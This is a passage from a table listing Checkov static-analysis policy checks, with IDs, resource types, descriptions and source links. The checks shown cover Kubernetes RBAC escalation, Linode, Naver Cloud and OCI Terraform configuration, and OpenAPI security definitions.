CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3480 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3481 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3482 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3483 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3484 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3485 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | -| 3486 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3487 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3488 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3489 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | -| 3490 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3491 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3492 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3493 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | -| 3494 | CKV2_K8S_5 | resource | ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3495 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3496 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3497 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | -| 3498 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | -| 3499 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | -| 3500 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | -| 3501 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | -| 3502 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | -| 3503 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | -| 3504 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | -| 3505 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | -| 3506 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | -| 3507 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 3508 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 3509 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | -| 3510 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | -| 3511 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | -| 3512 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | -| 3513 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | -| 3514 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | -| 3515 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | -| 3516 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | -| 3517 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | -| 3518 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | -| 3519 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | -| 3520 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | -| 3521 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | -| 3522 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | -| 3523 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 3524 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 3525 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | -| 3526 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | -| 3527 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | -| 3528 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 3529 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 3530 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | -| 3531 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | -| 3532 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | -| 3533 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | -| 3534 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | -| 3535 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | -| 3536 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | -| 3537 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | -| 3538 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | -| 3539 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | -| 3540 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | -| 3541 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | -| 3542 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | -| 3543 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | -| 3544 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | -| 3545 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | -| 3546 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | -| 3547 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | -| 3548 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | -| 3549 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | -| 3550 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | -| 3551 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | -| 3552 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | -| 3553 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | -| 3554 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | -| 3555 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | -| 3556 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3557 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3558 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3559 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | -| 3560 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | -| 3561 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | -| 3562 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | -| 3563 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | -| 3564 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) | -| 3565 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) | -| 3566 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) | -| 3567 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) | -| 3568 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. | OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) | -| 3569 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) | -| 3570 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) | -| 3571 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) | -| 3572 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) | -| 3573 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) | -| 3574 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) | -| 3575 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) | -| 3576 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) | -| 3577 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) | -| 3578 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) | -| 3579 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) | -| 3580 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | [OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) | -| 3581 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) | -| 3582 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) | -| 3583 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) | -| 3584 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) | -| 3585 | CKV_OPENSTACK_1 | provider | openstack | 